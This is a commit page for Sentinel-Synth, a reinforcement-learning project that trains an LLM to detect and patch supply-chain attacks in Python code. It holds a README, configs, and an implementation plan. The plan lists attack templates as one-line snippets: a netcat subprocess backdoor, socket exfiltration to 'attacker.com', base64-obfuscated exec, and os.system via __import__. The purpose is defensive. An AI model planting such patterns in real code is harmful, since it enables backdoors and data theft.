RAMCr7 committed on
Commit
91f7972
·
1 Parent(s): 9a00117

added initial

Browse files
Files changed (48) hide show
  1. README.md +118 -1
  2. config.yaml +28 -0
  3. docker/Dockerfile.sandbox +5 -0
  4. docs/implementation +277 -0
  5. requirements.txt +15 -0
  6. sentinel_synth/__init__.py +0 -0
  7. sentinel_synth/config.py +80 -0
  8. sentinel_synth/dashboard/__init__.py +0 -0
  9. sentinel_synth/dashboard/app.py +169 -0
  10. sentinel_synth/data/__init__.py +0 -0
  11. sentinel_synth/data/benign/ds_binarysearch.py +13 -0
  12. sentinel_synth/data/benign/ds_linkedlist.py +19 -0
  13. sentinel_synth/data/benign/ds_queue.py +15 -0
  14. sentinel_synth/data/benign/ds_sorting.py +8 -0
  15. sentinel_synth/data/benign/ds_stack.py +15 -0
  16. sentinel_synth/data/benign/io_config.py +15 -0
  17. sentinel_synth/data/benign/io_csv.py +11 -0
  18. sentinel_synth/data/benign/io_json.py +5 -0
  19. sentinel_synth/data/benign/io_log.py +8 -0
  20. sentinel_synth/data/benign/io_template.py +6 -0
  21. sentinel_synth/data/benign/math_factorial.py +5 -0
  22. sentinel_synth/data/benign/math_fibonacci.py +7 -0
  23. sentinel_synth/data/benign/math_gcd.py +5 -0
  24. sentinel_synth/data/benign/math_matrix.py +3 -0
  25. sentinel_synth/data/benign/math_prime.py +8 -0
  26. sentinel_synth/data/benign/misc_calc.py +13 -0
  27. sentinel_synth/data/benign/misc_date.py +3 -0
  28. sentinel_synth/data/benign/misc_password.py +8 -0
  29. sentinel_synth/data/benign/misc_temp.py +7 -0
  30. sentinel_synth/data/benign/misc_url.py +11 -0
  31. sentinel_synth/data/benign/str_anagram.py +3 -0
  32. sentinel_synth/data/benign/str_caesar.py +10 -0
  33. sentinel_synth/data/benign/str_palindrome.py +4 -0
  34. sentinel_synth/data/benign/str_slug.py +6 -0
  35. sentinel_synth/data/benign/str_wordcount.py +7 -0
  36. sentinel_synth/data/generate_scenarios.py +253 -0
  37. sentinel_synth/data/scenarios.json +402 -0
  38. sentinel_synth/data/sdk_config.yaml +33 -0
  39. sentinel_synth/envs/__init__.py +0 -0
  40. sentinel_synth/envs/sentinel_env.py +175 -0
  41. sentinel_synth/tests/__init__.py +0 -0
  42. sentinel_synth/tests/test_validator.py +57 -0
  43. sentinel_synth/training/__init__.py +0 -0
  44. sentinel_synth/training/train_grpo.py +187 -0
  45. sentinel_synth/validation/__init__.py +0 -0
  46. sentinel_synth/validation/docker_runner.py +107 -0
  47. sentinel_synth/validation/patch_validator.py +87 -0
  48. setup.py +15 -0
README.md CHANGED
@@ -1 +1,118 @@
1
- # PatchHawk
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # 🦅 Sentinel-Synth: Autonomous Supply-Chain Guard
2
+
3
+ **Sentinel-Synth** is an advanced Reinforcement Learning (RL) platform designed for the detection, analysis, and automated patching of software supply-chain vulnerabilities. It leverages **Group Relative Policy Optimization (GRPO)** and **Meta's Synthetic Data Kit** to train fine-tuned LLM agents that can secure CI/CD pipelines autonomously.
4
+
5
+ ---
6
+
7
+ ## 🏗 System Architecture
8
+
9
+ The Sentinel-Synth ecosystem is built on four functional pillars:
10
+
11
+ ```mermaid
12
+ graph TD
13
+ A[Meta SDK / Mutation Engine] -->|Synthetic Scenarios| B[Scenarios JSON]
14
+ B --> C[Gymnasium RL Environment]
15
+ C -->|Observations| D["GRPO Policy Agent (Qwen2.5-Coder)"]
16
+ D -->|Actions| C
17
+ C -->|Validation| E[Docker Sandbox & Patch Validator]
18
+ E -->|Reward Signal| D
19
+ D -->|Metrics| F[W&B / Dashboard]
20
+ ```
21
+
22
+ ### Core Components
23
+ - **`sentinel_synth.data`**: Orchestrates scenario synthesis using Meta's `synthetic-data-kit` (Track A) and a custom mutation engine (Track B).
24
+ - **`sentinel_synth.envs`**: A `gymnasium` environment that formalizes DevSecOps tasks into an RL problem.
25
+ - **`sentinel_synth.validation`**: A two-tiered execution engine that uses isolated Docker containers for syntax checking and re-attack verification.
26
+ - **`sentinel_synth.training`**: The training loop using `trl` and `unsloth` for efficient GRPO fine-tuning.
27
+
28
+ ---
29
+
30
+ ## 🚀 Getting Started
31
+
32
+ ### 1. Prerequisites
33
+ - **Python 3.10+** (3.11 recommended)
34
+ - **Docker** (Ensure your user has permission to manage containers)
35
+ - **vLLM Server** (Optional, for Track A synthetic data generation)
36
+ - **GPU** (NVIDIA/AMD) for standard training; CPU supported for dry-runs.
37
+
38
+ ### 2. Installation
39
+ ```bash
40
+ # Set up a virtual environment (recommended)
41
+ python3 -m venv venv
42
+ source venv/bin/activate
43
+
44
+ # Install the base system
45
+ pip install -r requirements.txt
46
+ pip install -e .
47
+
48
+ # Build the sandbox Docker image
49
+ docker build -t sentinel-sandbox:latest -f docker/Dockerfile.sandbox .
50
+ ```
51
+
52
+ ### 3. Configuration
53
+ Copy the sample environment file and adjust your settings:
54
+ ```bash
55
+ cp .env.example .env # Define model paths, W&B keys, etc.
56
+ ```
57
+ Edit `config.yaml` to tune training hyperparameters and environment thresholds.
58
+
59
+ ---
60
+
61
+ ## 🧪 Detailed Workflow
62
+
63
+ ### 📤 Phase 1: Data Generation & Analysis
64
+ Sentinel-Synth generates diverse training scenarios including Typosquatting, Obfuscated Exec, and Subprocess Backdoors.
65
+
66
+ **Using Meta's Synthetic Data Kit (Track A):**
67
+ 1. Ensure a vLLM server is running.
68
+ 2. Configure `sentinel_synth/data/sdk_config.yaml`.
69
+ 3. Run the generator:
70
+ ```bash
71
+ python3 -m sentinel_synth.data.generate_scenarios --use-sdk --output sentinel_synth/data/scenarios.json
72
+ ```
73
+
74
+ **Using the Mutation Engine (Track B):**
75
+ This mode takes benign code and injects malicious patterns deterministically.
76
+ ```bash
77
+ python3 -m sentinel_synth.data.generate_scenarios --output sentinel_synth/data/scenarios.json
78
+ ```
79
+
80
+ ---
81
+
82
+ ### 🧠 Phase 2: Agent Training (GRPO)
83
+ Train the `Qwen2.5-Coder-7B` model using the novel Group Relative Policy Optimization algorithm. GRPO allows the agent to learn complex decision-making without a value model.
84
+
85
+ **Dry-Run (Pipeline Validation):**
86
+ Test the logic on CPU without a GPU:
87
+ ```bash
88
+ python3 -m sentinel_synth.training.train_grpo --dry-run
89
+ ```
90
+
91
+ **Full Training:**
92
+ ```bash
93
+ # Ensure WANDB is logged in or API key is in .env
94
+ python3 -m sentinel_synth.training.train_grpo --use-docker
95
+ ```
96
+ *The agent is rewarded for valid detection (+1.5) and successful patching (+4.0), and penalized for false positives (-2.0).*
97
+
98
+ ---
99
+
100
+ ### 🛡 Phase 3: Validation & Sandbox Execution
101
+ Every patch proposed by the agent is autonomously validated in a secure Docker sandbox:
102
+ 1. **Syntax Check**: Ensuring the code is parseable.
103
+ 2. **Functional Test**: Running unit tests from `scenarios.json`.
104
+ 3. **Re-Attack Verification**: The system re-executes the vulnerability payload to verify the patch actually neutralized the threat (e.g., checking if suspicious file writes or network calls stopped).
105
+
106
+ ---
107
+
108
+ ## 📊 Monitoring & UI
109
+ - **Weights & Biases**: Real-time tracking of mean rewards, action distributions, and loss curves.
110
+ - **Streamlit Dashboard**: A professional interface for interactive analysis:
111
+ ```bash
112
+ streamlit run sentinel_synth/dashboard/app.py
113
+ ```
114
+
115
+ ---
116
+
117
+ ## 📄 License
118
+ Sentinel-Synth is licensed under the Apache 2.0 License. See the LICENSE file for details.
config.yaml ADDED
@@ -0,0 +1,28 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # ============================================================
2
+ # Sentinel-Synth Training & Pipeline Configuration
3
+ # All tunable hyperparameters live here
4
+ # ============================================================
5
+
6
+ data_generation:
7
+ num_samples: 10
8
+ output_format: "json"
9
+ benign_dir: "sentinel_synth/data/benign/"
10
+ scenarios_output: "sentinel_synth/data/scenarios.json"
11
+ sdk_config: "sentinel_synth/data/sdk_config.yaml"
12
+
13
+ training:
14
+ learning_rate: 0.000001
15
+ group_size: 4
16
+ max_seq_len: 1024
17
+ max_steps: 100
18
+ gradient_accumulation_steps: 4
19
+ ppo_clip_eps: 0.2
20
+ lora_r: 16
21
+ lora_alpha: 16
22
+ lora_dropout: 0
23
+ output_dir: "grpo_lora"
24
+
25
+ environment:
26
+ max_steps: 5
27
+ use_docker: false
28
+ sandbox_timeout_sec: 5
docker/Dockerfile.sandbox ADDED
@@ -0,0 +1,5 @@
 
 
 
 
 
 
1
+ FROM python:3.11-slim
2
+ RUN useradd -m sandbox
3
+ USER sandbox
4
+ WORKDIR /app
5
+ CMD ["python", "script.py"]
docs/implementation ADDED
@@ -0,0 +1,277 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # Sentinel-Synth Phase 1 — Implementation Plan
2
+
3
+ ## Goal
4
+
5
+ Build the complete Sentinel-Synth system: an RL-based supply-chain attack detection platform with synthetic data generation, a Gymnasium environment, Docker-sandboxed validation, GRPO training (Unsloth + W&B), and a Streamlit dashboard.
6
+
7
+ ## Project Structure
8
+
9
+ ```
10
+ PatchHawk/
11
+ ├── sentinel_synth/
12
+ │ ├── __init__.py
13
+ │ ├── envs/
14
+ │ │ ├── __init__.py
15
+ │ │ └── sentinel_env.py # Gymnasium RL environment
16
+ │ ├── data/
17
+ │ │ ├── __init__.py
18
+ │ │ ├── generate_scenarios.py # Synthetic data pipeline
19
+ │ │ ├── benign/ # 20-30 benign Python files
20
+ │ │ └── scenarios.json # Generated dataset (output)
21
+ │ ├── validation/
22
+ │ │ ├── __init__.py
23
+ │ │ ├── docker_runner.py # Docker sandbox execution
24
+ │ │ └── patch_validator.py # 3-step patch validation
25
+ │ ├── training/
26
+ │ │ ├── __init__.py
27
+ │ │ └── train_grpo.py # GRPO + Unsloth + W&B training
28
+ │ ├── dashboard/
29
+ │ │ └── app.py # Streamlit demo UI
30
+ │ └── tests/
31
+ │ ├── __init__.py
32
+ │ └── test_validator.py # Unit tests for validator
33
+ ├── docker/
34
+ │ └── Dockerfile.sandbox # Lightweight Python sandbox
35
+ ├── requirements.txt
36
+ ├── setup.py
37
+ └── README.md
38
+ ```
39
+
40
+ ---
41
+
42
+ ## Proposed Changes
43
+
44
+ ### Component 1: Benign Code Corpus (`sentinel_synth/data/benign/`)
45
+
46
+ #### [NEW] 25 benign Python files
47
+
48
+ Create 25 small, self-contained Python files that serve as the benign corpus for mutation. Categories:
49
+ - **Math utilities** (5): fibonacci, factorial, prime check, gcd, matrix ops
50
+ - **String utilities** (5): palindrome, anagram, caesar cipher, word count, slug generator
51
+ - **Data structures** (5): stack, queue, linked list, binary search, sorting
52
+ - **File/IO utilities** (5): CSV parser, JSON formatter, config reader, log parser, template engine
53
+ - **Misc** (5): temperature converter, password validator, date formatter, calculator, URL parser
54
+
55
+ Each file exports a main function with docstring and is testable with simple assertions.
56
+
57
+ ---
58
+
59
+ ### Component 2: Synthetic Data Generator (`sentinel_synth/data/generate_scenarios.py`)
60
+
61
+ #### [NEW] [generate_scenarios.py](file:///home/ram/Ram/repos/PatchHawk/sentinel_synth/data/generate_scenarios.py)
62
+
63
+ **Key design decisions:**
64
+ - **Track A (Meta synthetic-data-kit)**: Will be implemented as a pluggable module. Since it requires a running vLLM server with Llama 3 8B, the generator will have a `--use-sdk` flag. When disabled, it generates SDK-style examples from hardcoded templates (for offline/demo use).
65
+ - **Track B (Mutation engine)**: Deterministic mutation of benign files using 8 attack templates.
66
+ - Output: `scenarios.json` with 50+ entries.
67
+
68
+ **Attack templates (8):**
69
+ 1. Typosquatting import (`import pythonn`)
70
+ 2. Obfuscated exec (`exec(base64.b64decode(...))`)
71
+ 3. Environment variable hijack (`os.environ['PATH'] = '/tmp'`)
72
+ 4. Subprocess backdoor (`subprocess.call(['nc', ...])`)
73
+ 5. Pickle deserialization (`pickle.loads(untrusted)`)
74
+ 6. Hidden eval in decorator (`eval(user_input)`)
75
+ 7. Socket exfiltration (`socket.connect(('attacker.com', 80))`)
76
+ 8. Malicious `__import__` (`__import__('os').system('...')`)
77
+
78
+ **Scenario JSON schema:**
79
+ ```json
80
+ {
81
+ "id": "tp_001",
82
+ "type": "true_positive|false_positive|functional",
83
+ "code_snippet": "...",
84
+ "patch": "...|null",
85
+ "unit_test_code": "...|null",
86
+ "label": "malicious|benign",
87
+ "source": "mutation_engine|synthetic_data_kit|manual",
88
+ "attack_type": "typosquatting|obfuscated_exec|...|null"
89
+ }
90
+ ```
91
+
92
+ ---
93
+
94
+ ### Component 3: Docker Sandbox (`docker/Dockerfile.sandbox` + `sentinel_synth/validation/docker_runner.py`)
95
+
96
+ #### [NEW] [Dockerfile.sandbox](file:///home/ram/Ram/repos/PatchHawk/docker/Dockerfile.sandbox)
97
+
98
+ Minimal Python 3.11-slim image with non-root user, no network, memory/CPU limits.
99
+
100
+ #### [NEW] [docker_runner.py](file:///home/ram/Ram/repos/PatchHawk/sentinel_synth/validation/docker_runner.py)
101
+
102
+ - `run_in_docker(code, timeout_sec=5)` → `{"stdout", "stderr", "exit_code", "network_blocked", "file_writes"}`
103
+ - Uses `docker` Python SDK for container management
104
+ - Automatic temp directory cleanup
105
+ - Graceful container kill on timeout
106
+
107
+ ---
108
+
109
+ ### Component 4: Patch Validator (`sentinel_synth/validation/patch_validator.py`)
110
+
111
+ #### [NEW] [patch_validator.py](file:///home/ram/Ram/repos/PatchHawk/sentinel_synth/validation/patch_validator.py)
112
+
113
+ Three-step validation pipeline:
114
+ 1. **Syntax check**: `py_compile` in Docker
115
+ 2. **Unit test execution**: Run scenario's `unit_test_code` against patched code in Docker
116
+ 3. **Re-attack verification**: Confirm vulnerability is neutralized by comparing original vs. patched execution telemetry
117
+
118
+ Returns `(bool, str, dict)` — (passed, message, details).
119
+
120
+ ---
121
+
122
+ ### Component 5: Gymnasium Environment (`sentinel_synth/envs/sentinel_env.py`)
123
+
124
+ #### [NEW] [sentinel_env.py](file:///home/ram/Ram/repos/PatchHawk/sentinel_synth/envs/sentinel_env.py)
125
+
126
+ - Inherits `gymnasium.Env`
127
+ - **Observation space**: `Dict` with `code_snippet` (Text), `static_flags` (Box[5]), `risk_score` (Box[1])
128
+ - **Action space**: `Discrete(5)` — ANALYZE, EXECUTE_SANDBOX, BLOCK_PR, SUBMIT_PATCH, REQUEST_REVIEW
129
+ - `max_steps = 5`
130
+ - `reset()`: Random scenario selection, compute static flags + risk score
131
+ - `step(action)`: Full reward logic per spec (BLOCK=+2/-1, PATCH=+3/-1.5/-1, etc.)
132
+ - Integrates `docker_runner` and `patch_validator`
133
+
134
+ ---
135
+
136
+ ### Component 6: GRPO Training (`sentinel_synth/training/train_grpo.py`)
137
+
138
+ #### [NEW] [train_grpo.py](file:///home/ram/Ram/repos/PatchHawk/sentinel_synth/training/train_grpo.py)
139
+
140
+ - Load `Qwen2.5-Coder-7B` via Unsloth in 4-bit with LoRA
141
+ - Custom reward function that runs full environment trajectory
142
+ - `GRPOTrainer` from `trl` with group_size=4
143
+ - **W&B integration**: Log per-epoch metrics (mean reward, action distribution, patch success rate, loss)
144
+ - Hyperparameters: `lr=1e-6`, `group_size=4`, `ppo_clip_eps=0.2`, `max_seq_length=1024`
145
+ - Output: LoRA adapter to `./grpo_lora/`
146
+
147
+ > [!IMPORTANT]
148
+ > The training script requires GPU access (MI300X target) and a significant amount of VRAM for even the 4-bit model. During development, we'll include a `--dry-run` mode that validates the pipeline without actually training.
149
+
150
+ ---
151
+
152
+ ### Component 7: Streamlit Dashboard (`sentinel_synth/dashboard/app.py`)
153
+
154
+ #### [NEW] [app.py](file:///home/ram/Ram/repos/PatchHawk/sentinel_synth/dashboard/app.py)
155
+
156
+ - Code input text area
157
+ - "Analyze" button triggers environment run
158
+ - Display panels: Agent decision, Patch code, Validation result, Docker telemetry
159
+ - Demo mode with pre-loaded examples (1 malicious, 1 benign)
160
+ - Dark-themed UI with Cobalt Blue accent colors
161
+ - W&B run link display
162
+
163
+ ---
164
+
165
+ ### Component 8: Tests (`sentinel_synth/tests/test_validator.py`)
166
+
167
+ #### [NEW] [test_validator.py](file:///home/ram/Ram/repos/PatchHawk/sentinel_synth/tests/test_validator.py)
168
+
169
+ 4 test cases using pytest:
170
+ 1. `test_syntax_error_detected` — patch with syntax error → `(False, "Syntax error", ...)`
171
+ 2. `test_unit_test_pass` — correct patch → `(True, "Patch is valid", ...)`
172
+ 3. `test_unit_test_fail` — broken patch → `(False, "Unit test failed", ...)`
173
+ 4. `test_vulnerability_remains` — incomplete patch → `(False, "Vulnerability remains", ...)`
174
+
175
+ ---
176
+
177
+ ### Component 9: Project Configuration
178
+
179
+ #### [NEW] [requirements.txt](file:///home/ram/Ram/repos/PatchHawk/requirements.txt)
180
+
181
+ ```
182
+ gymnasium>=0.29.0
183
+ docker>=7.0.0
184
+ streamlit>=1.30.0
185
+ unsloth>=2024.0
186
+ trl>=0.7.0
187
+ transformers>=4.38.0
188
+ torch>=2.1.0
189
+ wandb>=0.16.0
190
+ pytest>=8.0.0
191
+ peft>=0.8.0
192
+ datasets>=2.16.0
193
+ ```
194
+
195
+ #### [NEW] [setup.py](file:///home/ram/Ram/repos/PatchHawk/setup.py)
196
+
197
+ Standard setuptools configuration registering `sentinel_synth` as a package.
198
+
199
+ #### [MODIFY] [README.md](file:///home/ram/Ram/repos/PatchHawk/README.md)
200
+
201
+ Full project documentation with architecture diagram, setup instructions, usage guide, and data flow.
202
+
203
+ ---
204
+
205
+ ## User Review Required
206
+
207
+ > [!IMPORTANT]
208
+ > **vLLM / Llama 3 dependency**: Track A of the data generator requires a running vLLM server with Llama 3 8B. Should I:
209
+ > - (A) Implement it with a fallback to template-based generation when the server is unavailable?
210
+ > - (B) Skip Track A entirely for Phase 1 and use only the mutation engine (Track B) + manual templates?
211
+
212
+ > [!IMPORTANT]
213
+ > **Docker requirement**: The sandbox and validator require Docker to be installed and the current user to have Docker permissions. Should I add a `--no-docker` mode that simulates sandbox execution for development/testing without Docker?
214
+
215
+ > [!WARNING]
216
+ > **W&B API key**: The training script needs a W&B API key. I'll use `wandb.login()` which reads from `WANDB_API_KEY` env var or prompts interactively. Is this acceptable?
217
+
218
+ ---
219
+
220
+ ## Open Questions
221
+
222
+ 1. **GPU availability**: Is the MI300X available now for testing the training script, or should I focus on making the pipeline work with `--dry-run` first?
223
+ 2. **Benign corpus**: Should I create the 25 benign Python files from scratch (my plan), or do you have an existing corpus to use?
224
+ 3. **synthetic-data-kit version**: Which version of Meta's synthetic-data-kit should I target? The API may have changed.
225
+
226
+ ---
227
+
228
+ ## Verification Plan
229
+
230
+ ### Automated Tests
231
+ ```bash
232
+ # 1. Generate scenarios
233
+ python -m sentinel_synth.data.generate_scenarios --output sentinel_synth/data/scenarios.json
234
+
235
+ # 2. Validate scenarios.json has 50+ entries
236
+ python -c "import json; d=json.load(open('sentinel_synth/data/scenarios.json')); assert len(d)>=50"
237
+
238
+ # 3. Build Docker sandbox image
239
+ docker build -t sentinel-sandbox:latest -f docker/Dockerfile.sandbox .
240
+
241
+ # 4. Run unit tests
242
+ pytest sentinel_synth/tests/test_validator.py -v
243
+
244
+ # 5. Test environment with gym checker
245
+ python -c "import gymnasium; from sentinel_synth.envs.sentinel_env import SentinelEnv; env=SentinelEnv(); gymnasium.utils.env_checker.check_env(env)"
246
+
247
+ # 6. Dry-run training
248
+ python -m sentinel_synth.training.train_grpo --dry-run
249
+
250
+ # 7. Launch dashboard
251
+ streamlit run sentinel_synth/dashboard/app.py
252
+ ```
253
+
254
+ ### Manual Verification
255
+ - Verify Docker containers are properly isolated (no network, memory limits)
256
+ - Verify W&B dashboard shows training metrics
257
+ - Verify Streamlit dashboard renders correctly with demo examples
258
+
259
+ ---
260
+
261
+ ## Execution Order
262
+
263
+ ```mermaid
264
+ graph TD
265
+ A[1. Project scaffolding + requirements] --> B[2. Benign corpus - 25 files]
266
+ B --> C[3. Data generator + scenarios.json]
267
+ A --> D[4. Dockerfile.sandbox]
268
+ D --> E[5. docker_runner.py]
269
+ E --> F[6. patch_validator.py]
270
+ C --> G[7. sentinel_env.py]
271
+ F --> G
272
+ G --> H[8. train_grpo.py + W&B]
273
+ F --> I[9. test_validator.py]
274
+ H --> J[10. Streamlit dashboard]
275
+ G --> J
276
+ J --> K[11. README.md]
277
+ ```
requirements.txt ADDED
@@ -0,0 +1,15 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ gymnasium>=0.29.0
2
+ docker>=7.0.0
3
+ streamlit>=1.30.0
4
+ unsloth>=2024.0
5
+ trl>=0.7.0
6
+ transformers>=4.38.0
7
+ torch>=2.1.0
8
+ wandb>=0.16.0
9
+ pytest>=8.0.0
10
+ peft>=0.8.0
11
+ datasets>=2.16.0
12
+ python-dotenv>=1.0.0
13
+ PyYAML>=6.0
14
+ synthetic-data-kit>=0.1.0
15
+ vllm-python-client>=0.1.0
sentinel_synth/__init__.py ADDED
File without changes
sentinel_synth/config.py ADDED
@@ -0,0 +1,80 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """
2
+ Centralized configuration loader for Sentinel-Synth.
3
+
4
+ Loads:
5
+ - .env → ENV dict (model names, API keys, secrets)
6
+ - config.yaml → CFG dict (training hyperparameters, paths)
7
+
8
+ Usage:
9
+ from sentinel_synth.config import ENV, CFG
10
+ """
11
+
12
+ import os
13
+ import yaml
14
+ from pathlib import Path
15
+
16
+ # ---------- .env loading (no external dependency) ----------
17
def _load_dotenv(path: str):
    """Parse a minimal ``.env`` file into a dict.

    Blank lines, ``#`` comments, lines without ``=``, and lines with an
    empty key are skipped. A leading ``export `` is tolerated, and one pair
    of matching surrounding quotes is removed from the value.

    Every non-empty value is also placed into ``os.environ`` with
    ``setdefault``, so variables already present in the real environment
    are never overwritten.

    Args:
        path: Location of the ``.env`` file.

    Returns:
        Mapping of key to value (both strings). Empty when the file does
        not exist.
    """
    env = {}
    if not os.path.exists(path):
        return env
    with open(path, encoding="utf-8") as f:
        for raw_line in f:
            line = raw_line.strip()
            if not line or line.startswith("#"):
                continue
            # Accept shell-style "export KEY=value" lines.
            if line.startswith("export "):
                line = line[len("export "):].lstrip()
            key, sep, value = line.partition("=")
            key = key.strip()
            # An empty key cannot be a valid environment variable name.
            if not sep or not key:
                continue
            value = value.strip()
            # KEY="value" / KEY='value' -> value
            if len(value) >= 2 and value[0] == value[-1] and value[0] in "\"'":
                value = value[1:-1]
            env[key] = value
            # Also set in os.environ so downstream libs (wandb) pick it up
            if value:
                os.environ.setdefault(key, value)
    return env
36
+
37
+ # Resolve project root (two levels up from this file)
38
+ _PROJECT_ROOT = Path(__file__).resolve().parent.parent
39
+ _dotenv_raw = _load_dotenv(str(_PROJECT_ROOT / ".env"))
40
+
41
+ ENV = {
42
+ "SYNTH_GENERATOR_MODEL": os.getenv("SYNTH_GENERATOR_MODEL", _dotenv_raw.get("SYNTH_GENERATOR_MODEL", "meta-llama/Llama-3.2-3B-Instruct")),
43
+ "GRPO_POLICY_MODEL": os.getenv("GRPO_POLICY_MODEL", _dotenv_raw.get("GRPO_POLICY_MODEL", "unsloth/Qwen2.5-Coder-7B-Instruct")),
44
+ "WANDB_API_KEY": os.getenv("WANDB_API_KEY", _dotenv_raw.get("WANDB_API_KEY", "")),
45
+ "WANDB_PROJECT": os.getenv("WANDB_PROJECT", _dotenv_raw.get("WANDB_PROJECT", "sentinel-synth")),
46
+ "WANDB_RUN_NAME": os.getenv("WANDB_RUN_NAME", _dotenv_raw.get("WANDB_RUN_NAME", "grpo-qwen-coder-7b")),
47
+ }
48
+
49
+ # ---------- config.yaml loading ----------
50
_config_path = _PROJECT_ROOT / "config.yaml"

# Built-in defaults. They are used as-is when config.yaml is missing or empty,
# and they fill in any section or key that config.yaml leaves out.
_DEFAULT_CFG = {
    "data_generation": {
        "num_samples": 10,
        "output_format": "json",
        "benign_dir": "sentinel_synth/data/benign/",
        "scenarios_output": "sentinel_synth/data/scenarios.json",
        "sdk_config": "sentinel_synth/data/sdk_config.yaml",
    },
    "training": {
        "learning_rate": 1e-6,
        "group_size": 4,
        "max_seq_len": 1024,
        "max_steps": 100,
        "gradient_accumulation_steps": 4,
        "ppo_clip_eps": 0.2,
        "lora_r": 16,
        "lora_alpha": 16,
        "lora_dropout": 0,
        "output_dir": "grpo_lora",
    },
    "environment": {
        "max_steps": 5,
        "use_docker": False,
        "sandbox_timeout_sec": 5,
    },
}

_loaded_cfg = None
if _config_path.exists():
    with open(_config_path, encoding="utf-8") as f:
        _loaded_cfg = yaml.safe_load(f)
# safe_load returns None for an empty file; treat any non-mapping as "no overrides".
if not isinstance(_loaded_cfg, dict):
    _loaded_cfg = {}

# Start from the file's content (keeps any extra sections), then overlay each
# known section on top of its defaults so missing keys never raise KeyError.
CFG = dict(_loaded_cfg)
for _section, _defaults in _DEFAULT_CFG.items():
    _overrides = _loaded_cfg.get(_section)
    if isinstance(_overrides, dict):
        CFG[_section] = {**_defaults, **_overrides}
    else:
        CFG[_section] = dict(_defaults)
sentinel_synth/dashboard/__init__.py ADDED
File without changes
sentinel_synth/dashboard/app.py ADDED
@@ -0,0 +1,169 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ import streamlit as st
2
+ import json
3
+ import time
4
+
5
+ from sentinel_synth.envs.sentinel_env import SentinelEnv
6
+
7
+ st.set_page_config(
8
+ page_title="Sentinel-Synth Dashboard",
9
+ page_icon="🛡️",
10
+ layout="wide",
11
+ initial_sidebar_state="expanded",
12
+ )
13
+
14
+ # Custom CSS for Cobalt Blue theming and dark mode
15
+ st.markdown("""
16
+ <style>
17
+ :root {
18
+ --cobalt-blue: #0047AB;
19
+ --cobalt-light: #2A6DC9;
20
+ --cobalt-dark: #002255;
21
+ }
22
+ .stApp {
23
+ background-color: #0d1117;
24
+ color: #c9d1d9;
25
+ }
26
+ .css-1d391kg {
27
+ background-color: #161b22;
28
+ }
29
+ /* Headers */
30
+ h1, h2, h3 {
31
+ color: #58a6ff !important;
32
+ }
33
+ /* Sidebar */
34
+ .css-1lcbmhc {
35
+ background-color: #161b22;
36
+ }
37
+ /* Buttons */
38
+ .stButton>button {
39
+ background-color: var(--cobalt-blue);
40
+ color: white;
41
+ border: none;
42
+ border-radius: 4px;
43
+ transition: 0.3s;
44
+ }
45
+ .stButton>button:hover {
46
+ background-color: var(--cobalt-light);
47
+ border: none;
48
+ color: white;
49
+ }
50
+ /* Info box */
51
+ .info-box {
52
+ background-color: #1c2128;
53
+ border-left: 4px solid var(--cobalt-blue);
54
+ padding: 1rem;
55
+ border-radius: 0.25rem;
56
+ margin-bottom: 1rem;
57
+ }
58
+
59
+ .status-malicious { color: #ff7b72; font-weight: bold; }
60
+ .status-benign { color: #3fb950; font-weight: bold; }
61
+ .status-patched { color: #79c0ff; font-weight: bold; }
62
+ </style>
63
+ """, unsafe_allow_html=True)
64
+
65
@st.cache_resource
def get_env():
    """Return a ``SentinelEnv`` built with ``use_docker=False``.

    Decorated with ``st.cache_resource``, so Streamlit reuses the same
    instance instead of constructing a new one on each call.
    """
    return SentinelEnv(use_docker=False)
68
+
69
def main():
    """Render the dashboard and, on request, run a scripted analysis episode.

    The page offers a sidebar (mode selection, Docker toggle), optional demo
    scenario loaders, and a code text area. Pressing the analyze button
    resets the environment on the chosen scenario and drives it with a
    hard-coded placeholder policy (no trained adapter is loaded here), then
    shows the action, reward, telemetry and patch in a report.
    """
